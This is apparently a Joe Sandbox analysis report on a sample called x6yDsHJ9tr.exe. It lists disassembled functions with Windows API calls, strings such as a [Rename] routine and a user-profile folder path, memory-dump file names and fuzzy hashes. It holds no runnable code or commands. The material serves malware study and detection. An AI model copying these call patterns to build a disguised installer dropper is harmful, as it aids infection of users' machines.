                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                  • String ID:
                                                                  • API String ID: 245916457-0
                                                                  • Opcode ID: 112ed65e04edae18aea6c652d1e90aa8a5c75abf4c4ba3bea1abec85b0df24e8
                                                                  • Instruction ID: 2defe8d22be57f99eb627f30d420bedef33aec9620f24b6d51525e28d6583c1c
                                                                  • Opcode Fuzzy Hash: 112ed65e04edae18aea6c652d1e90aa8a5c75abf4c4ba3bea1abec85b0df24e8
                                                                  • Instruction Fuzzy Hash: 28229A71D1064ADFDB19CFA4C9807EEB7F9FB08315F24452ED1A6E2280D7709A86CB58
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                  Strings
                                                                  • C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 0040226E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
                                                                  • API String ID: 542301482-3948318427
                                                                  • Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                  • Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
                                                                  • Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                  • Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                  • Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
                                                                  • Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                  • Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
                                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                                  • SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
                                                                  • DeleteObject.GDI32(00000000), ref: 00405168
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                                    • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004052AC
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
                                                                  • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405498
                                                                  • GlobalFree.KERNEL32(?), ref: 004054A8
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 00405604
                                                                  • ShowWindow.USER32(?,00000000), ref: 00405652
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                                  • ShowWindow.USER32(00000000), ref: 00405664
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 2564846305-813528018
                                                                  • Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                  • Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
                                                                  • Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                  • Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                                  • ShowWindow.USER32(?), ref: 0040415E
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404170
                                                                  • ShowWindow.USER32(?,00000004), ref: 00404189
                                                                  • DestroyWindow.USER32 ref: 0040419D
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                                  • GetDlgItem.USER32(?,?), ref: 004041D5
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                                  • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                                  • GetDlgItem.USER32(?,?), ref: 0040429B
                                                                  • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404310
                                                                  • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                                  • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                                  • EnableWindow.USER32(?,?), ref: 004043E9
                                                                  • EnableWindow.USER32(?,?), ref: 00404404
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040441A
                                                                  • EnableMenuItem.USER32(00000000), ref: 00404421
                                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404439
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                                  • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                                  • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                                  • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                  • String ID: H/B
                                                                  • API String ID: 1860320154-184950203
                                                                  • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                  • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                                  • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                  • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                                  APIs
                                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040485E
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040488F
                                                                  • GetSysColor.USER32(?), ref: 004048A0
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                                  • lstrlenW.KERNEL32(?), ref: 004048C1
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                                  • SendMessageW.USER32(00000000), ref: 00404943
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                                  • SetCursor.USER32(00000000), ref: 004049C2
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                                  • SetCursor.USER32(00000000), ref: 004049DE
                                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 00404A0D
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                  • String ID: 7G@$Call$N
                                                                  • API String ID: 3103080414-3155595626
                                                                  • Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                  • Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
                                                                  • Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                  • Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                                  • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                                    • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                    • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                  • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                                  • wsprintfA.USER32 ref: 00406347
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
                                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                                    • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00406176
                                                                    • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                  • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                                  • API String ID: 2171350718-2529913679
                                                                  • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                  • Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
                                                                  • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                  • Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                  • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                                  • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                  • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                                  APIs
                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                                  • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                                  • "C:\Users\user\Desktop\x6yDsHJ9tr.exe", xrefs: 00406974
                                                                  • *?|<>/":, xrefs: 00406982
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-3560645010
                                                                  • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                  • Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
                                                                  • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                  • Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                                  • GetSysColor.USER32(00000000), ref: 004046C3
                                                                  • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                                  • SetBkMode.GDI32(?,?), ref: 004046DB
                                                                  • GetSysColor.USER32(?), ref: 004046EE
                                                                  • SetBkColor.GDI32(?,?), ref: 004046FE
                                                                  • DeleteObject.GDI32(?), ref: 00404718
                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                  • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                  • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
